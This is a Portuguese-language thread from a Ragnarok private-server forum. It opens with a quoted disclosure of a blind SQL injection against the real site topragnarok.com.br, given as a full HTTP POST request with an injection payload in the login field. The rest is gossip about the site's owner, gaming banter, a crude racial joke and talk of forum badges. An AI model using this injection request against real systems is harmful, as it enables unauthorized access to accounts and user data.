Ir para conteúdo
Slicer

Admin do Rag + Top Ragnarok + Brasil sil sil sil

Recommended Posts

Se liguem no que apareceu em meu fórum:

Ola galera,

Me desculpe comunidade e adms, tive uma crise momentânea de infantilidade. Irei mandar senha/ email do cadastro do topragnarok do servidor no Mp.

Segue abaixo falha Blind Sql do topragnarok:

POST /index.php?s=cpanel HTTP/1.1
Content-Length: 84
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: topragnarok.com.br
Cookie: PHPSESSID=br4i5gu4dben2c97dj7lapkv03; avaliacao22779=1; avaliacao=1; avaliacao21879=1; avaliacao22716=1; fluxSessionData=tcovdk7pk8sdu2nph7tnmqfj51
Host: topragnarok.com.br
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

evlogin=-1'%20OR%203*2*1%3d6%20AND%20000440%3d000440%20--%20&evpass=g00dPa%24%24w0rD

Para entendedores meia palavras basta.

Compartilhar este post

Link para o post
Compartilhar em outros sites
6 horas atrás, p4rck disse:

Se um dia você conseguir provar isso, falar até papagaio fala. Mas não me causa estranheza você afirmar isso de mim, afinal você sequer conseguiu interpretar no meu texto a parte em que digo que anti-ético(s) são os donos do topragnarok.

E viu só como eu tenho razão? Eu nunca ouvi falar de você, você nunca falou 1 palavra comigo e já ta me acusando de algo que nunca fiz. Foi como eu falei, te deletar DO NADA do topragnarok ele não te deletou, algo você fez pra ele. Talvez você tenha feito com ele o que acabou de fazer comigo, falou merda e foi mal educado quando VOCÊ tinha total razão.

E mais uma vez digo: independente do que tenha feito pra ele, não dá razão pra ele fazer oque fez.

Abraços, fique em paz. (e eu ainda espero a prova de que eu vendia itens no meu servidor. e não desafio só você, desafio qualquer um do mundo do ragnarok)

Um velho sonho chamado Ragnarok.

Compartilhar este post

Link para o post
12 horas atrás, KyukE disse:

Só sei que ontem 22 horas eu tava trollando partida da galera, Irelia suporte... só coisa linda

Olha que eu tenho Photoshop CS5 e no computador ! Mas agora que desafio foi lançado quero vê as provas!!!

Irelia SUP da bom,

Meu amigo... difícil subir na Solo 5x5 viu, eu fiz a md5 4 vezes kkkkkkkk,

A Primeira Ganhei 2, perdi 2, na última veio a atualização 8.22 e eu fui inventar de fechar o jogo para atualizar, atualizei, loguei, startei a ranked e PUFF... DC Geral, não consegui conectar nem pelo caralho!

Fui no forum ai vi lá uns 300+ tópicos de pessoas com o mesmo problema, ai a riot desabilitou as rankeds para arrumar o erro, quando eu FUCKING LOGO no Lolzinho, o que aparece para mim? "Leave Burst"... perdi a última partida, perdi 20 pdl e tomei no rabo.

~~~~

Na segunda vez peguei a galera full troll mesmo, tipo uns mlk de 12 anos que nunca tinha jogado lol e me afundaram bonito, na terceira vez eu ZEREI meu PDL na madrugada, perdi 12 partidas seguidas na ranked, cara...

Tava puro Ódio, mas pensei "vamo lá.. vo desistir não" , na quarta eu joguei como profissional, peguei minha Role JG de YI , WW , uns boneco retardado assim e só fui... subi izão e peguei gold 5.

~~

Eu nem sou acostumado jogar ranked, só jogo no final da season para pegar GOLD e as premiações do elo xD

Compartilhar este post

Link para o post

Ja pegaram o meliante? Ja tinha reunido uns 2 negões da Angola aqui pra pegar os caras...

Que que eu faço com esses Negões agora?

image.png.72d8e3a02f97be78e3c6bc2914950396.png

Compartilhar este post

Link para o post

com quem eu falo para encomendar outra treta dessa?

Compartilhar este post

Link para o post
Em 13/11/2018 at 22:44, Slicer disse:

Se liguem no que apareceu em meu fórum:

Cara.. kkkkkk, esse topragnarok é uma piada, mas infelizmente é necessário ter o seu servidor lá, pois é o que é mais acessado pelos jogadores.

Compartilhar este post

Link para o post

se o assunto for lolzin eu to interessado, se for ragnarok foda-se falo

Compartilhar este post

Link para o post

O dono do top é o Marcelo Velter, mesmo dono do FansRO, agora chamado FansBrasil porque o mesmo está sendo processo pela LUG por uso de imagens da Gravity/Roubo de players da LUG. Ele também tem conchavo com o WorldRag, que é administrado por um ex GM dele de anos atrás, da época em que o FansRO ainda tinha os servidores Arena e Thunder.

Beijos.

Compartilhar este post

Link para o post
51 minutos atrás, Animus disse:

O dono do top é o Marcelo Velter, mesmo dono do FansRO, agora chamado FansBrasil porque o mesmo está sendo processo pela LUG por uso de imagens da Gravity/Roubo de players da LUG. Ele também tem conchavo com o WorldRag, que é administrado por um ex GM dele de anos atrás, da época em que o FansRO ainda tinha os servidores Arena e Thunder.

Beijos.

O FansRO ainda existe como FansRO.

Eu nunca consegui cadastrar no .com.br. Por algum motivo, eu não recebo o e-mail de confirmação e minha antiga conta eu não consigo alterar o texto. Basicamente dei o fodase na época que tinha meus servidores brs.

Compartilhar este post

Link para o post
Em 18/12/2018 at 13:26, TioHugo disse:

Eu nunca consegui cadastrar no .com.br. Por algum motivo, eu não recebo o e-mail de confirmação e minha antiga conta eu não consigo alterar o texto. Basicamente dei o fodase na época que tinha meus servidores brs.

É claro que o site "FansRO.org" ainda existe filhão... Mas procure pelo FansRO no topragnarok.com.br (que é o top dele)... A única coisa de "Fans" que você vai achar é o "FansBrasil".
Agora abra o site deles, clique no link do fórum (http://forum.fansbrasil.com/) e procure pela "comunidade" (Facebook) deles, veja as fotos e verá que são as fotos do FansRO (se ele não apagar até você ler essa resposta, já que ele está de olho aqui segundo já mencionaram).
Você também não verá mais esse perfil do Facebook linkado no fórum antigo (http://forum.fansro.org/). Veja também que o Marcelo (eth0) copiou todas as tabelas de seu antigo fórum, tanto que ele possui a quantidade de posts do fórum fansro.org no fórum fansbrasil.com.

Enfim...

Compartilhar este post

Link para o post
On 12/18/2018 at 1:26 PM, TioHugo said:

Removeram a barra de contriba mais mantiveram a de tradutor, vai saber =/

Compartilhar este post

Link para o post
7 horas atrás, SBK disse:

Vai vê é pq ele ta  tentando contribuir de alguma forma.. @Jonyll da uma barra bonitinha para o SBK, nunca te pedi nada.

Compartilhar este post

Link para o post
Em 24/12/2018 at 12:24, SBK disse:

Compartilhar este post

Link para o post

falar em barrinhas essas atuais são horriveis, a de tradutor + o resto q era antes são bem melhor, fl

Editado por Wolf

Compartilhar este post

Link para o post
1 hora atrás, Wolf disse:

falar em barrinhas essas atuais são horriveis, a de tradutor + o resto q era antes são bem melhor, fl

aceito novas se quiser

sobre as barras, eu na realidade fiz errado, acabei movendo geral pra membro comum, sendo que o certo era fazer o que fiz no restante, acabei ficando sem tempo pra voltar geral ao grupo certo

A ideia base é, deixar todos no mesmo nível por assim dizer, sem esse monte de cor.. obviamente somos todos gratos a todos que já passaram pela equipe.. mas, vamos deixar todos quase no mesmo patamar

Compartilhar este post

Link para o post
12 horas atrás, JulioCF disse:

aceito novas se quiser

sobre as barras, eu na realidade fiz errado, acabei movendo geral pra membro comum, sendo que o certo era fazer o que fiz no restante, acabei ficando sem tempo pra voltar geral ao grupo certo

A ideia base é, deixar todos no mesmo nível por assim dizer, sem esse monte de cor.. obviamente somos todos gratos a todos que já passaram pela equipe.. mas, vamos deixar todos quase no mesmo patamar

Faz um padrão de cores aí que eu faço pra você as novas.. só me falar quais grupos tb

Compartilhar este post

Link para o post

as cores são as de sempre, não tem porque mudar.

os grupos também

• Admin
  • Anunciante
  • +Membro
  • Membro

extra, pois hoje não se usa mais, mas pode ser que volte a usar

• Moderador
  • Moderador Local
  • Coordenador de Moderação
  • Desenvolvedor

Compartilhar este post

Link para o post
Em 08/01/2019 at 09:29, JulioCF disse:

as cores são as de sempre, não tem porque mudar.

os grupos também

• Admin
  • Anunciante
  • +Membro
  • Membro

extra, pois hoje não se usa mais, mas pode ser que volte a usar

• Moderador
  • Moderador Local
  • Coordenador de Moderação
  • Desenvolvedor 

2019 e você acha que o Wolf vai fazer algo? Não aprendeu ainda? :maldito:

Compartilhar este post

Link para o post
2 horas atrás, KyukE disse:

2019 e você acha que o Wolf vai fazer algo? Não aprendeu ainda? :maldito:

Não tem como iniciar o ano sem pedir algo pro wolf sabendo que não será feito.
se não fizer isso, o mundo entra em parafuso

Compartilhar este post

Link para o post
Em 11/01/2019 at 14:13, JulioCF disse:

Não tem como iniciar o ano sem pedir algo pro wolf sabendo que não será feito.
se não fizer isso, o mundo entra em parafuso

:confiante:

Compartilhar este post

Link para o post

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora

Seja bem vindo ao Cronus-Emulator.
É sempre um prazer te-lo conosco.
Você pode visualizar nossas áreas de suporte para encontrar suas soluções sem a necessidade de se registrar!
Registrando em nossa comunidade, você poderá conhecer mais sobre nosso projeto, criar tópicos, responder tópicos existentes, baixar milhares de recursos em nosso sistema de downloads, participar de nossa comunidade, customizar seu perfil e muito mais... Se você já possui uma conta, faça seu login - ou crie uma conta. Também temos integração com Google+ e Facebook.